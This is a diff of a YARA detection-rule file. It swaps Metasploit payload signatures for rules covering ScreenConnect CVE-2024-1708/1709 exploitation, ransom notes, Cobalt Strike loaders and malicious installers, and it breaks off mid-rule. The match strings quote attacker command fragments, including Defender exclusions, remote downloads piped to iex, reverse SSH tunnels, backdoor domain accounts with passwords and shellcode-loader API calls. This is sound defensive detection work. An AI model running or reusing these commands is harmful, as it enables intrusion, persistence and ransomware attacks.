+		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account wasn't actually used yet to login"
+		author = "Florian Roth"
+		id = "c57e6c6a-298f-5ff3-b76a-03127ff88699"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L20-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1aeb97c19365f996dc1bc0fd6e01342878967be25d3e042158eba986af28b4a"
-		score = 75
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054"
+		logic_hash = "2433ad11ca1d9f970eb3c536a13f07e808c2a0b8b0dd625dffbe4947268ab8f5"
+		score = 65
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s1 = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(" ascii
-		$s2 = "public enum MemoryProtection { ExecuteReadWrite = 0x40 }" fullword ascii
-		$s3 = ".func]::VirtualAlloc(0,"
-		$s4 = ".func+AllocationType]::Reserve -bOr [" ascii
-		$s5 = "New-Object System.CodeDom.Compiler.CompilerParameters" fullword ascii
-		$s6 = "ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" fullword ascii
-		$s7 = "public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }" fullword ascii
-		$s8 = ".func]::CreateThread(0,0,$" fullword ascii
-		$s9 = "public enum Time : uint { Infinite = 0xFFFFFFFF }" fullword ascii
-		$s10 = "= [System.Convert]::FromBase64String(\"/" ascii
-		$s11 = "{ $global:result = 3; return }" fullword ascii
+		$a1 = "<Users xmlns:xsi="
+		$a2 = "<CreationDate>"
+		$s1 = "@poc.com</Email>"
+		$s2 = "<LastLoginDate>0001"
 
 	condition:
-		4 of them
+		filesize < 200KB and all of ( $a* ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_4
+rule SIGNATURE_BASE_SUSP_Screenconnect_User_Poc_Com_Used_Feb24 : FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "00d7681b-6041-5fe1-adbb-8b7c40df0193"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L104-L121"
+		description = "Detects suspicious ScreenConnect user with poc.com email address, which is a sign of exploitation of the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability with the POC released by WatchTower and the account was already used yet to login"
+		author = "Florian Roth"
+		id = "91990558-f145-5968-9722-b6815f6ad8d5"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/blob/45e5b2f699a4d8f2d59ec3fc79a2e3c99db71882/watchtowr-vs-ConnectWise_2024-02-21.py#L53"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L40-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e84ef13aa72c7c35520b3534b908c7d00240915ab02f8216a2cef6440c322a2"
+		logic_hash = "50967a07a9789f20ccbc882c3b9e3142f0c28068c0a58b9d8927d725d02bf289"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef"
+		tags = "FILE"
 
 	strings:
-		$s1 = "= VirtualAlloc(IntPtr.Zero,(UIntPtr)" ascii
-		$s2 = ".Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);" ascii
-		$s3 = "[System.Runtime.InteropServices.DllImport(\"kernel32\")]" fullword ascii
-		$s4 = "private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;" fullword ascii
-		$s5 = "private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);" fullword ascii
+		$a1 = "<Users xmlns:xsi="
+		$a2 = "<CreationDate>"
+		$s1 = "@poc.com</Email>"
+		$f1 = "<LastLoginDate>0001"
 
 	condition:
-		4 of them
+		filesize < 200KB and all of ( $a* ) and $s1 and not 1 of ( $f* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Exe_2
+rule SIGNATURE_BASE_SUSP_Screenconnect_Exploitation_Artefacts_Feb24 : SCRIPT
 {
 	meta:
-		description = "Metasploit Payloads - file msf-exe.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a55a33e1-8f04-5417-af0c-b7e2da36fb46"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L123-L139"
+		description = "Detects post exploitation indicators observed by HuntressLabs in relation to the ConnectWise ScreenConnect (versions prior to 23.9.8) vulnerability that allows an Authentication Bypass"
+		author = "Florian Roth"
+		id = "079f4153-8bc7-574f-b6fa-af5536b842ab"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L62-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd82f496ade1a62e0aee8c8c90cee84377cb90adf11c87652082e74c8c85e568"
+		logic_hash = "6f0d5f878847da1afb0d7b83e84bd337cfa67c36da2cbb33af712ed4ffad490a"
 		score = 75
 		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401"
+		tags = "SCRIPT"
 
 	strings:
-		$x1 = "= new System.Diagnostics.Process();" fullword ascii
-		$x2 = ".StartInfo.UseShellExecute = true;" fullword ascii
-		$x3 = ", \"svchost.exe\");" ascii
-		$s4 = " = Path.GetTempPath();" ascii
+		$x01 = "-c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}"
+		$x02 = ".msi c:\\mpyutd.msi"
+		$x03 = "/MyUserName_$env:UserName"
+		$x04 = " -OutFile C:\\Windows\\Help\\"
+		$x05 = "/Create /TN \\\\Microsoft\\\\Windows\\\\Wininet\\\\UserCache_"
+		$x06 = "$e = $r + \"ssh.exe\""
+		$x07 = "Start-Process -f $e -a $args -PassThru -WindowStyle Hidden).Id"
+		$x08 = "-R 9595:localhost:3389 -p 443 -N -oStrictHostKeyChecking=no "
+		$x09 = "chromeremotedesktophost.msi', $env:ProgramData+"
+		$x10 = "9595; iwr -UseBasicParsing "
+		$x11 = "curl  https://cmctt.]com/pub/media/wysiwyg/"
+		$x12 = ":8080/servicetest2.dll"
+		$x13 = "/msappdata.msi c:\\mpyutd.msi"
+		$x14 = "/svchost.exe -OutFile "
+		$x15 = "curl http://minish.wiki.gd"
+		$x16 = " -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile "
+		$x17 = "rundll32.exe' -Headers @"
+		$x18 = "/nssm.exe' -Headers @"
+		$x19 = "c:\\programdata\\update.dat UpdateSystem"
+		$x20 = "::size -eq 4){\\\"TVqQAA" ascii wide
+		$x21 = "::size -eq 4){\"TVqQAA" ascii wide
+		$x22 = "-nop -c [System.Reflection.Assembly]::Load(([WmiClass]'root\\cimv2:System_"
+		$xp0 = "/add default test@2021! /domain"
+		$xp1 = "/add default1 test@2021! /domain"
+		$xp2 = "oldadmin Pass8080!!"
+		$xp3 = "temp 123123qwE /add "
+		$xp4 = "oldadmin \"Pass8080!!\""
+		$xp5 = "nssm set xmrig AppDirectory "
 
 	condition:
-		all of them
+		1 of ( $x* )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_5
+rule SIGNATURE_BASE_SUSP_Command_Line_Combos_Feb24_2 : SCRIPT FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.msi"
-		author = "Florian Roth (Nextron Systems)"
-		id = "030d1982-c9a8-539d-a995-7901ae425857"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L141-L156"
+		description = "Detects suspicious command line combinations often found in post exploitation activities"
+		author = "Florian Roth"
+		id = "d9bc6083-c3ca-5639-a9df-483fea6d0187"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L105-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb602670329391b091f87818a0f5defaa8f688f7921978510739b96ca63a2f12"
+		logic_hash = "0cd7b4771aa8fd622e873c5cdc6689d24394e5faf026b36d5f228ac09f4e0441"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a6c66dfc998bf5838993e40026e1f400acd018bde8d4c01ef2e2e8fba507065"
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$s1 = "required to install Foobar 1.0." fullword ascii
-		$s2 = "Copyright 2009 The Apache Software Foundation." fullword wide
-		$s3 = "{50F36D89-59A8-4A40-9689-8792029113AC}" fullword ascii
+		$sa1 = " | iex"
+		$sa2 = "iwr -UseBasicParsing "
 
 	condition:
-		all of them
+		filesize < 2MB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_6
+rule SIGNATURE_BASE_SUSP_PS1_Combo_Transfersh_Feb24 : SCRIPT
 {
 	meta:
-		description = "Metasploit Payloads - file msf.vbs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5485102b-e709-5111-814a-e6878b4bd889"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L158-L177"
+		description = "Detects suspicious PowerShell command that downloads content from transfer.sh as often found in loaders"
+		author = "Florian Roth"
+		id = "fd14cca5-9cf8-540b-9d6e-39ca2c267272"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L120-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9498828a55477049922e50329d0c38ee34b8484562113a2686669ccbb8b3318"
-		score = 75
+		logic_hash = "64d4343ecdcbc4a28571557bec2f31c1ff73c2ecf63d0feaa0a71001bb9bf499"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f"
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
-		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s3 = ".GetSpecialFolder(2)" ascii
-		$s4 = ".Write Chr(CLng(\"" ascii
-		$s5 = "= \"4d5a90000300000004000000ffff00" ascii
-		$s6 = "For i = 1 to Len(" ascii
-		$s7 = ") Step 2" ascii
+		$x1 = ".DownloadString('https://transfer.sh"
+		$x2 = ".DownloadString(\"https://transfer.sh"
+		$x3 = "Invoke-WebRequest -Uri 'https://transfer.sh"
+		$x4 = "Invoke-WebRequest -Uri \"https://transfer.sh"
 
 	condition:
-		5 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_7
+rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lockbit_Ransomnote_Feb24
 {
 	meta:
-		description = "Metasploit Payloads - file msf.vba"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8d1b742e-510a-5807-ad3f-f10cc325d292"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L179-L194"
+		description = "Detects the LockBit ransom note file 'LockBit-DECRYPT.txt' which is a sign of a LockBit ransomware infection"
+		author = "Florian Roth"
+		id = "b2fcb2a7-49e8-520c-944f-6acd5ded579b"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L137-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "167d295de5ffc9c88cf72f086fef4514f08cc3b9dd2d93b3ec36acffd6430370"
+		logic_hash = "1fe07c33de1971b1f9430851dec4b8cd9f3ac7f087f0de18a2da4a390891b674"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f"
 
 	strings:
-		$s1 = "Private Declare PtrSafe Function CreateThread Lib \"kernel32\" (ByVal" ascii
-		$s2 = "= VirtualAlloc(0, UBound(Tsw), &H1000, &H40)" fullword ascii
-		$s3 = "= RtlMoveMemory(" ascii
+		$x1 = ">>>> Your personal DECRYPTION ID:"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_8
+rule SIGNATURE_BASE_MAL_SUSP_RANSOM_Lazy_Ransomnote_Feb24
 {
 	meta:
-		description = "Metasploit Payloads - file msf.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "54466663-12ef-5fa4-a13c-e80ddbc0f4f8"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L196-L215"
+		description = "Detects the Lazy ransom note file 'HowToRestoreYourFiles.txt' which is a sign of a Lazy ransomware infection"
+		author = "Florian Roth"
+		id = "287dfd67-8d0d-5906-b593-3af42a5a3aa4"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L151-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d2b26276843cdfef2d1458ee6c3e2ecea962d1cd42bc21b86ebd03599bebcbc6"
+		logic_hash = "c9416d05f0bd9aab9d6108380c1b5364f4c4e112b6e0726202f083eaacfdcf56"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f"
 
 	strings:
-		$s1 = "[DllImport(\"kernel32.dll\")]" fullword ascii
-		$s2 = "[DllImport(\"msvcrt.dll\")]" fullword ascii
-		$s3 = "-Name \"Win32\" -namespace Win32Functions -passthru" fullword ascii
-		$s4 = "::VirtualAlloc(0,[Math]::Max($" ascii
-		$s5 = ".Length,0x1000),0x3000,0x40)" ascii
-		$s6 = "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);" fullword ascii
-		$s7 = "::memset([IntPtr]($" ascii
+		$x1 = "All Encrypted files can be reversed to original form and become usable"
 
 	condition:
-		6 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Cmd
+rule SIGNATURE_BASE_SUSP_MAL_Signingcert_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-cmd.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71d42c34-a0b0-5173-8f2f-f48a7af0e4ff"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L217-L230"
+		description = "Detects PE files signed with a certificate used to sign malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "f25ea77a-1b4e-5c13-9117-eedf0c20335a"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L166-L184"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea44b3d00733eb7d4f924ccaece5265fcd90a462acb954a134b5355ecb0621e5"
+		logic_hash = "824efe1fa441322d891805df9a1637ebb44d18889572604acc125bf79a2d1083"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b"
+		hash2 = "e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793"
 
 	strings:
-		$x1 = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e" ascii
+		$s1 = "Wisdom Promise Security Technology Co." ascii
+		$s2 = "Globalsign TSA for CodeSign1" ascii
+		$s3 = { 5D AC 0B 6C 02 5A 4B 21 89 4B A3 C2 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 70000KB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_9 : FILE
-{
-	meta:
-		description = "Metasploit Payloads - file msf.war - contents"
-		author = "Florian Roth (Nextron Systems)"
-		id = "488a2e97-ebc2-5ccf-ab5d-dfed4b534b52"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L232-L252"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5761b51b79f83c48deafaf3786cb90ef493ab0448cd67b86655cecb0160a627"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		hash1 = "e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81"
-
-	strings:
-		$s1 = "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1)" fullword ascii
-		$s2 = ".concat(\".exe\");" fullword ascii
-		$s3 = "[0] = \"chmod\";" ascii
-		$s4 = "= Runtime.getRuntime().exec(" ascii
-		$s5 = ", 16) & 0xff;" ascii
-		$x1 = "4d5a9000030000000" ascii
 
-	condition:
-		4 of ( $s* ) or ( uint32( 0 ) == 0x61356434 and $x1 at 0 )
-}
-rule SIGNATURE_BASE_Msfpayloads_Msf_10 : FILE
+rule SIGNATURE_BASE_MAL_CS_Loader_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3bc3b66a-9f8a-55c2-ae2a-00faa778cef7"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L254-L269"
+		description = "Detects Cobalt Strike malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "6c9914a4-b079-5a39-9d3b-7b9a2b54dc2b"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L186-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c772fdc40e110ef1287da680dc4ef1718b86856abab4d814ec7bc2ee1e7808ee"
+		logic_hash = "ae0e25c2dda1b727978977c674e834cd659661c597d88395a6f46ad5a179e9f0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe"
 
 	strings:
-		$s1 = { 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 }
-		$s2 = { 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b }
-		$s3 = { 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f }
+		$s1 = "Dll_x86.dll" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "UpdateSystem" ) and ( pe.imphash ( ) == "0dc05c4c21a86d29f1c3bf9cc5b712e0" or $s1 ) )
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Svc : FILE
+
+rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Indicators_Feb24 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-svc.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "45d1c527-1f90-50f3-8e64-e77d69386b0a"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L271-L285"
+		description = "Detects Lockbit ransomware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "108430c8-4fe5-58a1-b709-539b257c120c"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L208-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "21c6aa2333335a5822328fb5176ca37060eb401640ed5cc340aefb63685078f4"
+		logic_hash = "e4cd6b1a1bc57bf25c71f6bc228f45e4a996f9d9d391aeb3dda9c7d7857610bc"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b02c9c10577ee0c7590d3dadc525c494122747a628a7bf714879b8e94ae5ea1"
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0"
 
 	strings:
-		$s1 = "PAYLOAD:" fullword ascii
-		$s2 = ".exehll" ascii
+		$op1 = { 76 c1 95 8b 18 00 93 56 bf 2b 88 71 4c 34 af b1 a5 e9 77 46 c3 13 }
+		$op2 = { e0 02 10 f7 ac 75 0e 18 1b c2 c1 98 ac 46 }
+		$op3 = { 8b c6 ab 53 ff 15 e4 57 42 00 ff 45 fc eb 92 ff 75 f8 ff 15 f4 57 42 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "914685b69f2ac2ff61b6b0f1883a054d" or 2 of them ) or all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_11
+rule SIGNATURE_BASE_MAL_MSI_Mpyutils_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf.hta"
-		author = "Florian Roth (Nextron Systems)"
-		id = "59b0cced-ffdc-5f2f-878c-856883ee275f"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L287-L302"
+		description = "Detects malicious MSI package mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709"
+		author = "Florian Roth"
+		id = "e7794336-a325-5b92-8c25-81ed9cb28044"
+		date = "2024-02-23"
+		modified = "2024-04-24"
+		reference = "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_connectwise_screenconnect_vuln_feb24.yar#L230-L247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f003989a99315b42c0c73beaa2928d0187fe92a4bf329912d64fac9f8fc9358c"
-		score = 75
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6"
+		logic_hash = "ba20db486e5d3c29c9702e10628fb3c0e55e52bbec74e3a86ed6511a6475b82f"
+		score = 70
+		quality = 85
+		tags = "CVE-2024-1708, CVE-2024-1709, FILE"
+		hash1 = "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600"
 
 	strings:
-		$s1 = ".ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then" fullword ascii
-		$s2 = "= CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
-		$s3 = "= CreateObject(\"Wscript.Shell\") " fullword ascii
+		$s1 = "crypt64ult.exe" ascii fullword
+		$s2 = "EXPAND.EXE" wide fullword
+		$s6 = "ICACLS.EXE" wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 20000KB and all of them
 }
-rule SIGNATURE_BASE_Msfpayloads_Msf_Ref
+rule SIGNATURE_BASE_MAL_Beacon_Unknown_Feb24_1 : CVE_2024_1708 CVE_2024_1709 FILE
 {
 	meta:
-		description = "Metasploit Payloads - file msf-ref.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "517ed365-03c6-5563-984b-dae10464671a"
-		date = "2017-02-09"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L304-L323"
+		description = "Detects malware samples mentioned in a HuntressLabs report on the exploitation of ScreenConnect vulnerability CVE-2024-1708 and CVE-2024-1709 "
